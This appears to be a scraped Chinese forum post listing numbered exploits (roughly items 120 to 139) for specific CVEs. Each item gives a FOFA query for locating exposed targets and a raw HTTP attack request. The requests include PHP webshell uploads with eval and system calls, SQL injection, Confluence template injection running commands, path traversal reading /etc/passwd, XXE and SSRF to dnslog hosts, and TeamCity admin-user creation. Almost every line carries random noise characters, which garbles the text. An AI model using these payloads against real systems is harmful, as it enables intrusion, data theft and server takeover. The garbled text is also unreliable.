. `% E Z7 w: k, j' Y' M- uCVE-2024-1253
* z. q/ R: v% WFOFA:title="Smart管理平台"" z: C" P2 b" N6 K; p. t
POST /useratte/web.php? HTTP/1.11 K/ _/ X; |: D6 V# O( n
Host: ip:port! o5 L/ s5 @1 H2 [4 s
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
# F B4 E/ o. O L3 F; Y" E! HUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
% L3 d8 u X2 k1 V6 o9 @Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8& I! @8 L0 R: m
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ t! A1 _, j2 NAccept-Encoding: gzip, deflate
2 B, i# v, j( q2 i9 N1 CContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
, j* r, Y& ]0 X1 C; nContent-Length: 5976 k8 c& ]" }& l
Origin: https://ip:port! F4 J% G- Y4 _- q7 m. r
Referer: https://ip:port/sysmanage/licence.php m" |2 R% Z9 ?( s1 n; W
Upgrade-Insecure-Requests: 1! e, O9 D1 _( y' M p3 f
Sec-Fetch-Dest: document
4 c2 n7 p3 ~1 ~. [; jSec-Fetch-Mode: navigate$ U E4 l# [ n8 H B: V Q$ ~ |
Sec-Fetch-Site: same-origin) _1 L9 L0 l" H9 @$ B% Z" U) [
Sec-Fetch-User: ?1+ ^0 b: R9 Y, l* I3 t) K
Te: trailers
) _, h3 D! ~* h. A1 UConnection: close
( {+ O5 L2 Z$ e4 O) I( x9 D/ R6 c$ Z* `$ E L# s9 A
-----------------------------42328904123665875270630079328' P+ I9 U8 x6 [3 |2 p' v
Content-Disposition: form-data; name="file_upload"; filename="2.php", t8 Q! \; W. l4 J6 Q/ K( j
Content-Type: application/octet-stream2 `3 Q, c& ~0 f% y$ t7 N1 |, ]
' z/ j$ i( U7 L9 J<?php phpinfo()?>
/ X2 [' }/ J& S) R- @0 P-----------------------------42328904123665875270630079328: X5 c1 M. V* d/ |9 u0 P
Content-Disposition: form-data; name="id_type"; U& V; Y. Z2 P
% q7 V9 x7 o- a+ |7 y
1* T" _% o3 @/ G/ R% N
-----------------------------423289041236658752706300793284 u/ m7 X5 S5 Z$ s
Content-Disposition: form-data; name="1_ck"+ s3 u" ?" j u. \ ~6 J
3 D& W/ a- y; K5 r7 S1_radhttp/ u# t. B. E! U4 s2 t* \
-----------------------------423289041236658752706300793286 v: f/ M r0 d
Content-Disposition: form-data; name="mode"
5 g2 _, Q) J7 n/ Q) _1 a. b
; A9 [" J7 H0 L+ Y( Timport
8 b$ {3 @: g3 q9 C2 Y; k+ Z-----------------------------42328904123665875270630079328
5 Y* Q* ] @1 H4 w: Y9 W6 M& g7 u" Q6 d5 ], p
f4 K, v" s; Q) f0 J, i
文件路径/upload/2.php) L3 k; N" Z+ `: X/ j1 I* F1 C7 N
* }4 T0 z5 M. Z' q# z \. ~
121. 北京百绰智能S42管理平台userattestation.php任意文件上传8 ^5 \; K4 g; [* A& F/ T ?6 h
CVE-2024-1918. l7 m$ f! E+ P* X! O6 p2 p Q
FOFA:title="Smart管理平台"- z+ g6 ~% b$ I. ^- I% D
POST /useratte/userattestation.php HTTP/1.1
, Q$ m$ F) B: q& q. H' m# @5 RHost: 192.168.40.130:8443
: h, g* F3 I# C' GCookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50 ^3 S' a: x. K E& M+ H; C
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko9 Q$ Q% I8 C- n; J
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8. D' W& i0 k% ]- ^; k4 z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* l' I& U* T& d0 m
Accept-Encoding: gzip, deflate: D! y- I2 m9 U5 u
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
" _% N# Y$ C2 z. p9 a7 J4 F0 B! FContent-Length: 592! I2 [0 q) Y7 M* H6 _& T# b
Origin: https://192.168.40.130:8443
5 C ?) ?) i( J) W+ q( vUpgrade-Insecure-Requests: 1: l% G U6 I# u$ x# d7 n$ v3 `
Sec-Fetch-Dest: document5 a& M8 Z P8 Z' q D
Sec-Fetch-Mode: navigate7 r$ j$ ^' H" G) q$ J& T6 L2 y
Sec-Fetch-Site: same-origin- |7 \- E/ i( R8 c8 F( Y
Sec-Fetch-User: ?1
/ H- ], c3 O2 VTe: trailers
- e9 C0 a7 A% k% o" b, B, h; OConnection: close9 h& k! h6 c+ W O
4 I1 I/ k/ K, i0 o: t" i( D9 a-----------------------------42328904123665875270630079328
- d, b& q: {. P% u; ~, BContent-Disposition: form-data; name="web_img"; filename="1.php"$ T' n0 r% y& c& `$ h
Content-Type: application/octet-stream/ k7 l8 `5 P+ N+ v4 a6 ?$ r
% R9 y* s3 F% t8 s$ R% X+ O- s
<?php phpinfo();?>% {' W) _8 C. R
-----------------------------42328904123665875270630079328
! Q0 B! A* @$ O* {4 C1 RContent-Disposition: form-data; name="id_type"
; x' R, i6 W3 a W! p' L7 w" ^' q. n0 z* r+ F. ^0 I" x
1 W+ l1 `8 B$ F7 ]' S
-----------------------------42328904123665875270630079328
8 c$ D: J8 N0 g' J& {" h! y, LContent-Disposition: form-data; name="1_ck"( f5 v, Q3 ]; I( \+ W- c- P
: N/ q% ~8 q9 ^) {) r9 }/ s$ X' t( K1_radhttp
$ n, I1 _ q! ]-----------------------------42328904123665875270630079328
' ^6 q( M0 @$ x& F7 F0 e1 hContent-Disposition: form-data; name="hidwel"
$ a' z5 R) M l. D/ l; \
- o9 X( b' Z& }+ {+ `! dset
3 o/ J: P/ _, @# I% Q$ G7 `-----------------------------42328904123665875270630079328
) F; F7 [2 b G3 _
$ s% Q0 e+ z P6 K: L
8 G" Q3 w6 q0 ?: ^/ d( K5 v" {boot/web/upload/weblogo/1.php3 a/ y1 M1 t3 l
% _, T( G; v9 x# q& Q9 R; i
122. 北京百绰智能s200管理平台/importexport.php sql注入1 O9 Y1 X! V8 {" I7 o' l
CVE-2024-27718FOFA:title="Smart管理平台"
# g6 x$ H5 \1 |5 o x其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()! _( W; p4 E$ B& n, g
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
: d9 n7 [$ \& _! }, W; A) KHost: x.x.x.x7 N: p- ^9 ~; L
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
2 m4 }+ d- t0 Y' xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.09 G% a w) X( K# A+ c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8# f' ?8 g' S+ w/ \) j
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& I+ A7 N6 a7 q. k5 SAccept-Encoding: gzip, deflate, br
/ `1 j/ z8 G" C8 r* `Upgrade-Insecure-Requests: 13 V# I0 S3 }4 c: P5 S' ~
Sec-Fetch-Dest: document" t: Y7 s1 X. A/ `( N
Sec-Fetch-Mode: navigate) J7 l4 g+ ]+ v& ]- p8 T
Sec-Fetch-Site: none3 c) z. W" E) i/ y) A
Sec-Fetch-User: ?1
6 D/ |+ P- m! G. \2 pTe: trailers
" x- c% m. p# B: [. }. kConnection: close
: T# S# P5 X) { X# X( R! d: v/ ]: P) n4 f% M+ @
% A, e8 B9 {! R! z9 J: c C123. Atlassian Confluence 模板注入代码执行
( Q; l5 {2 |, i1 E# O, ?FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"" j+ T" T% E4 Q7 c5 G4 Z
POST /template/aui/text-inline.vm HTTP/1.1+ R2 U; n; i7 n. j! J$ @" {
Host: localhost:8090! o1 b$ {1 T! ~$ V
Accept-Encoding: gzip, deflate, br
9 a0 K1 [; I4 W' zAccept: */*& S2 D% b* B, _* P3 Q9 H2 w
Accept-Language: en-US;q=0.9,en;q=0.8 } n. [- n+ _9 {/ \ V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
- z4 _/ w/ y, b7 \* U3 _Connection: close
; r5 o; u6 T+ a3 }1 P# I: ] J4 bContent-Type: application/x-www-form-urlencoded1 O- X8 R) ?0 W! u1 l$ D" h
" }! D* G: p+ `5 `
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))+ E! p) h5 o. F+ M
9 Y$ V! B) G. L0 d/ R5 t, g, U3 i4 a# R: O5 n
124. 湖南建研工程质量检测系统任意文件上传
8 f2 d6 C- [- {0 BFOFA:body="/Content/Theme/Standard/webSite/login.css"; S& e" _, r: e! u ~8 I7 n8 T
POST /Scripts/admintool?type=updatefile HTTP/1.1
. S0 {, t0 u" m) B* ?Host: 192.168.40.130:8282
! X2 m3 g D* m0 pUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
" b) ?$ _# t" WContent-Length: 725 g* K: Q7 q5 w1 w5 E2 w3 G9 D
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
3 a7 L" {; v1 |8 z) V6 f: HAccept-Encoding: gzip, deflate, br
5 I+ r, ]+ q. ~ [# g: j3 l+ I- O8 @Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) ^+ c1 [: u. Z( J: JConnection: close0 ?, ^2 c+ g& I
Content-Type: application/x-www-form-urlencoded
( u! T8 V% ^# f' _# r3 `/ f" a& }$ Z- V
/ ^; I1 Z' f5 g- F* i% ufilePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%># q' h. U% }/ g) h
; {# y: @/ _) F. Z4 }
3 b3 h) `/ r; Q0 ehttp://192.168.40.130:8282/Scripts/abcgcg.aspx
, J0 G' M, n ?4 t. Y" w6 B# M
) l `/ V: k7 e; _, n' O% ^, j" E. L125. ConnectWise ScreenConnect身份验证绕过) w4 I; w T, Y* ^$ p t. b
CVE-2024-1709
q# b* U/ S0 o0 j# n0 qFOFA:icon_hash="-82958153"" M/ {/ D; J* l* _, j( d" s$ J7 w. w) O
https://github.com/watchtowrlabs ... bypass-add-user-poc. S r; W6 S% G Z+ w4 p: Y
8 N( Y y. n$ v s% z) f7 |" w: B3 u
# T- ?: x7 f. e" J, J& K) J( K5 D使用方法4 c2 L7 y3 `- d
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!. E+ p- B+ S# n5 _. D
0 ~" ^" c; U/ O2 Y0 V+ e. O. U) z- R0 }! g2 A2 d; `
创建好用户后直接登录后台,可以执行系统命令。$ s) a+ A# S+ b/ S
- L6 D# I) P( {. F7 i; ?# R
126. Aiohttp 路径遍历& ~, ~' g& T4 N8 z3 d
FOFA:title=="ComfyUI"
0 x/ _( B; o7 t# R, h7 L/ ?- dGET /static/../../../../../etc/passwd HTTP/1.18 {6 \% b0 [; V1 H$ U1 ?8 ^3 l
Host: x.x.x.x: c& {$ ~; p; Z# Z0 {! k
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
( q( U' p7 `9 E9 t7 w9 SConnection: close
' m/ \' o! e; r, l5 I5 KAccept: */*
6 P1 H) A" k" o) e$ LAccept-Language: en( ^/ _% I6 F! `2 u
Accept-Encoding: gzip* y6 j! q( A' ]& l. r( G4 U6 ?1 W
1 a% i2 E- h& `* q9 w9 B. R
: x8 k8 Z8 j) M; v6 M2 P; v127. 广联达Linkworks DataExchange.ashx XXE
$ S$ e2 L7 {3 T! o1 yFOFA:body="Services/Identification/login.ashx"
3 y- Q, }% T/ P6 Z9 \POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
- N0 z! S" e7 r5 h$ u9 ]Host: 192.168.40.130:8888
8 i ?7 G! w @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
( V- {' L6 G) KContent-Length: 4156 I8 n% ?, R' l( M
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
7 e5 f+ \& L# _8 a' E. qAccept-Encoding: gzip, deflate, ?" u2 Q a0 V2 K3 {3 O# X) n! `. e
Accept-Language: zh-CN,zh;q=0.9
) h4 h+ \2 C+ x! JConnection: close+ l6 T* W% }: Q. {
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0" D; q0 [& N) h8 P+ i1 l9 t/ g
Purpose: prefetch
1 t, q: {$ w' D- A" q0 vSec-Purpose: prefetch;prerender4 {* {7 C) L" O; |( {' f) c) o2 ]; W
( o( ]' m3 _' I( ~( J' k' A
------WebKitFormBoundaryJGgV5l5ta05yAIe0, D: ?1 j2 f( K' ?
Content-Disposition: form-data;name="SystemName"
3 g& n# G* Q9 v( U) l/ b. ^; x; U' Q6 w' u
BIM
, d& N2 H- \' n------WebKitFormBoundaryJGgV5l5ta05yAIe0) z$ d# M2 p9 M- E; O
Content-Disposition: form-data;name="Params"4 A& [5 e# T5 u* u
Content-Type: text/plain
# I5 \- j% z- a* E; q# t5 T" {, o0 i
<?xml version="1.0" encoding="UTF-8"?>
8 o% f. z1 _) H4 C7 F2 b<!DOCTYPE test [
% h6 u7 i: `9 h! L3 T<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">8 w. L8 C2 s2 K# _
]+ f$ @3 M' A- Z- ?
>1 M4 I1 h/ U& Q$ P
<test>&t;</test>& u3 O9 O' e$ _ T8 q6 P
------WebKitFormBoundaryJGgV5l5ta05yAIe0--
) `: `# A/ T& b1 R9 l( d
/ r$ `3 }2 T; q. p' P% f- ?" B
/ e, P% m+ Y8 V" e' _" h. `5 M' D2 {+ m5 g
128. Adobe ColdFusion 反序列化
d* b3 i1 J" x) O3 hCVE-2023-38203
8 Q0 H! Y/ D- L7 ^$ YAdobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)- j+ v# `/ q9 g& N: X
FOFA:app="Adobe-ColdFusion"# @: R" S3 f7 e, c) }
PAYLOAD$ r8 w% b3 i& m- \' a
, Z& E {3 Q# A3 {$ u! w; }129. Adobe ColdFusion 任意文件读取* T- T& {0 _- U+ I; Z7 t! j
CVE-2024-20767
- o& N0 A6 S5 v9 i( b) B. fFOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
: l+ {' B: P0 j0 u: P: P+ o第一步,获取uuid
, @# R, v% ?! D+ hGET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
I$ l' i9 Y: AHost: x.x.x.x
) M; M. o9 Z! [# X8 bUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
' t- M. k/ t6 u3 IAccept: */*5 C# ?2 j1 C* ?
Accept-Encoding: gzip, deflate
2 _) i. Q# m, Q. TConnection: close4 i+ I) X6 O* p. ?% ^8 i
* }1 R' [% t& h0 J4 a
' _% e+ E0 w1 x, M3 D
第二步,读取/etc/passwd文件
0 l! w: e: u. u6 r8 MGET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
( k4 w9 m9 M& _+ C8 k* ?Host: x.x.x.x9 P6 I: F* a6 |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.361 F+ E5 u0 {4 _6 k
Accept: */*8 c# [! |! o: @
Accept-Encoding: gzip, deflate* r( V& f$ v L1 W9 p( X
Connection: close1 D; j0 `" h% s
uuid: 85f60018-a654-4410-a783-f81cbd5000b98 A$ m) G/ e7 `2 q. U
/ n) M( p3 v" E4 |, t: Z2 T
' a9 `$ ?! R/ N `% ^' w130. Laykefu客服系统任意文件上传 {) P. a$ i3 H; I
FOFA:icon_hash="-334624619"
) s' T3 I* z5 S8 o) G1 gPOST /admin/users/upavatar.html HTTP/1.1" {) @' E" u0 S$ T, G' x
Host: 127.0.0.1. Z+ q0 M7 Y7 R( S* Y/ M& Z- u) J4 |
Accept: application/json, text/javascript, */*; q=0.01
$ a7 n& Y" r: G, uX-Requested-With: XMLHttpRequest5 E& B3 k. t+ a- o. C
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
3 M' ]# z' S% |1 {& z; @" CContent-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
' F; g5 T' U3 b( pAccept-Encoding: gzip, deflate8 ^0 q. s1 t9 N, j7 m9 z; W, C
Accept-Language: zh-CN,zh;q=0.9. c/ u% M8 ^( _5 ^
Cookie: user_name=1; user_id=3" u( o( a# F( |
Connection: close
H' o+ Q; O' w. F+ y8 d* R6 v0 a" s1 y8 y2 p3 v
------WebKitFormBoundary3OCVBiwBVsNuB2kR
- W* ]; i! E' o; AContent-Disposition: form-data; name="file"; filename="1.php"
/ f: b. r \/ G2 X5 N4 g- @- G) ?Content-Type: image/png u7 ], I8 y) T$ K e( N. h: u: A
7 L9 o' F# b, l1 w- o+ @; Q: ?
<?php phpinfo();@eval($_POST['sec']);?>' `4 @; l5 y0 z; E6 s) `( Y6 Y
------WebKitFormBoundary3OCVBiwBVsNuB2kR--
& l. h: J, V7 h2 }! v
: l3 h- q$ m' v4 Z" u0 w) w2 h% n& {3 b2 I4 s: x# u( ~6 M( c
131. Mini-Tmall <=20231017 SQL注入2 @/ H5 g7 l" {( D$ @( {" U# F
FOFA:icon_hash="-2087517259"/ a- Z+ T8 ?& y+ }& W
后台地址:http://localhost:8080/tmall/admin
0 Y% F- t- |, c0 J) {http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
' t1 ^$ e* b& v- l, E) H9 d( n) ^& h- | k/ y0 w+ N
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
% I6 t/ _* e. Z1 F/ ECVE-2024-27198
- R; o, X$ ^5 `0 z$ w; JFOFA:body="Log in to TeamCity"
6 o, ~! z% P5 }POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.16 I0 H _ F, L" S% s5 M- j
Host: 192.168.40.130:8111- X2 O# O' X, C4 y' J: ~8 b$ s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
( U! N/ `$ t" q& MAccept: */** f/ ^. C5 d7 J9 s- a$ y8 v
Content-Type: application/json
2 l+ H+ g; ?6 Z% R' gAccept-Encoding: gzip, deflate2 i: S/ L. l9 w% o9 ^& C$ u
" D6 O7 {! G" m0 _9 H{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}# j, B/ N& B' \! \9 e+ j- ?
+ j" r2 _. o% A0 J
' F: p9 f5 g& I1 U2 }6 h qCVE-2024-27199
% x3 ^" v% V+ v7 ]- `9 k/res/../admin/diagnostic.jsp! s+ U# M s/ T4 J% V9 {; l- @ O6 j
/.well-known/acme-challenge/../../admin/diagnostic.jsp
' g0 V2 y1 |8 C9 { N8 W9 D/update/../admin/diagnostic.jsp
. k( z7 v6 U6 t& ~; j3 b" \! V/ x' v* e% i( ~3 c
/ I* x4 @3 p: h7 A& | p% Q! s- C+ xCVE-2024-27198-RCE.py; P2 b3 q% E) A6 v! S
9 t, m) c, {+ ]: x9 H6 _
133. H5 云商城 file.php 文件上传
5 v. }6 y" v5 x( t/ BFOFA:body="/public/qbsp.php" B0 x' ?/ g8 A; z& I# h' Q
POST /admin/commodtiy/file.php?upload=1 HTTP/1.10 T) S0 M, \9 Q
Host: your-ip' S$ `3 d+ X4 v6 Z! n. ~
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
/ a ]+ U* z: K8 f3 n4 cContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx8 ~' I5 v- V/ L( Z7 O
0 M V+ ]8 s9 }, G. o2 o% m, i------WebKitFormBoundaryFQqYtrIWb8iBxUCx
2 d; w7 Z( m* r. D3 s x; q/ EContent-Disposition: form-data; name="file"; filename="rce.php"
' x- R0 i; [0 s3 |( _Content-Type: application/octet-stream; p7 F( A* S( p8 G) q. a( D! L
* `5 \( e/ L& V b<?php system("cat /etc/passwd");unlink(__FILE__);?>
# L- t5 O' ?4 `. t------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
7 z; v2 A" g/ a5 H& g2 U
# f" b9 M4 R, {( h' L
# a9 ~5 } B, R% B: U3 B
_: b' s, g+ u& Z& {134. 网康NS-ASG应用安全网关index.php sql注入& e/ q9 u( _* ]8 Z: s
CVE-2024-2330
. M/ ~) }( _1 P+ Q* xNetentsec NS-ASG Application Security Gateway 6.3版本
7 Y9 N3 f1 {8 Q+ O; J9 K) RFOFA:app="网康科技-NS-ASG安全网关"5 G6 r y1 B, x5 E% N& e4 w6 Y
POST /protocol/index.php HTTP/1.1" `* A. ] O$ E6 b0 e
Host: x.x.x.x
( @4 I: i# T1 h/ jCookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
: O l. P/ w5 A$ dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
3 A+ }2 R, t$ i5 w0 EAccept: */*! V* I" m; E0 v5 W, J7 }9 D: t
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
M# i8 T, b# y# fAccept-Encoding: gzip, deflate+ L7 h: x3 J& O+ M$ a
Sec-Fetch-Dest: empty
. t! H" ]4 k5 d, }8 ?: \9 p: ^Sec-Fetch-Mode: cors% p) I- U2 d# W5 I$ R/ L$ M1 f
Sec-Fetch-Site: same-origin
; Z* P7 a1 _ G! T2 X+ ?4 h FTe: trailers# j% g, w, i0 ?% i
Connection: close1 {3 V2 K+ ?* G; W5 [
Content-Type: application/x-www-form-urlencoded. R6 h4 s' M6 _
Content-Length: 2632 e3 J) z( e; q: X
' k0 X r0 T K. _' }. [
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}1 q) z+ f0 x( i3 w
" ]# S7 b/ P2 a& |3 p2 ^5 q. ?1 O
( S j1 {2 b2 l* g1 Q. P3 n135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
7 Z( H6 @3 o0 G' s$ F' n# cCVE-2024-2022
7 @* U4 K0 r3 `( b( k6 Z$ ONetentsec NS-ASG Application Security Gateway 6.3版本9 u: M2 I( `3 }: k( T6 |3 n1 }
FOFA:app="网康科技-NS-ASG安全网关"
5 G _' e8 r1 M5 Z+ }5 n# |' ZGET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1' [3 p0 P+ M2 I4 U/ m
Host: x.x.x.x
% a& `7 I, T$ L4 t" x7 t% n9 O/ PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36+ l2 @9 Y7 V; D* w7 J; W! t. d7 P% L, e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.72 i. W" j4 H8 a; M
Accept-Encoding: gzip, deflate
1 X/ N* E1 @1 u5 d0 z) NAccept-Language: zh-CN,zh;q=0.9
" }' z" D5 m9 bConnection: close
; T+ D- u% q0 Y: Q) K# {4 a* I/ `2 @
/ B2 w+ J& N4 L136. NextChat cors SSRF
3 q8 x* F9 a+ i$ Q; o3 XCVE-2023-49785
/ f. V, r& H/ {' X1 P! GFOFA:title="NextChat"& I) i( t: ^* z b' |
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1+ a; K$ R) T% [/ y4 p
Host: x.x.x.x:10000# ~% T/ a4 F. V
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
( F. H; C" O( p. ZConnection: close" G+ l) e* n' x% D7 [7 s7 O
Accept: */*
2 Y- O& N' E1 N! [Accept-Language: en
. h2 g! ]0 q3 n- Q' ~/ `' M) {Accept-Encoding: gzip- s' I. S X ?: m
# h1 B7 z- a+ D
( j( s2 m- F3 o' c* _& b137. 福建科立迅通信指挥调度平台down_file.php sql注入
4 j; b) W5 E. L% N0 Z5 y8 yCVE-2024-2620
2 ^3 f, X- @+ N4 k. `FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
% D/ a9 Y( V0 S4 C2 V1 QGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1! f9 V9 d$ U+ Y
Host: x.x.x.x( z4 C( _, v+ ~5 R" f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0* J( [% i9 Q5 `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
9 i& C; c$ M0 g4 ~7 MAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 A3 T6 G3 l4 `3 B5 z# S
Accept-Encoding: gzip, deflate, br
) E3 m! C7 W! fConnection: close
2 u! f" k: {4 D# P: C& x3 wCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
3 C5 e, I D# a5 Q: M2 J3 ^Upgrade-Insecure-Requests: 1
( @- @; B, E9 A/ h$ n) g- m: b5 h+ N) t! E
* }# C9 a d) ?2 i `/ `138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
: Q/ p" e3 D9 E" h: M M. LCVE-2024-2621
$ [+ K% E" Z+ y& p' tFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"/ \+ K2 v" W9 L% Y) N
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
7 H& j; S3 \/ c$ }Host: x.x.x.x2 ?4 W5 G6 C' D9 J9 m, i+ V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
/ C1 n: a6 a7 n, F) {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
. m5 O! A" Z7 P" Y7 vAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 }( O, I1 A1 N2 ?5 ZAccept-Encoding: gzip, deflate, br
: z- o! N7 C5 E4 yConnection: close* O+ J) A! N* u
Upgrade-Insecure-Requests: 1* l7 e1 V! O9 T0 u V7 w% O
! P% g% ?+ B9 o9 [: |, O4 _& ?0 d) r; h
139. 福建科立讯通信指挥调度平台editemedia.php sql注入. `8 }) Q$ W$ R9 u# B/ _1 f
CVE-2024-2622: o3 z* q/ l4 e& {+ _
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"' L* p# B1 A9 _ Q
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1: v: w' y% F" g0 }3 o
Host: x.x.x.x
5 P+ L: K: S9 VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0; M9 T7 m7 V' w7 p0 R- B$ b$ b# Q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.83 Y L+ z+ p" ^0 b7 q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" l' Y: g9 h- @+ L2 `' H
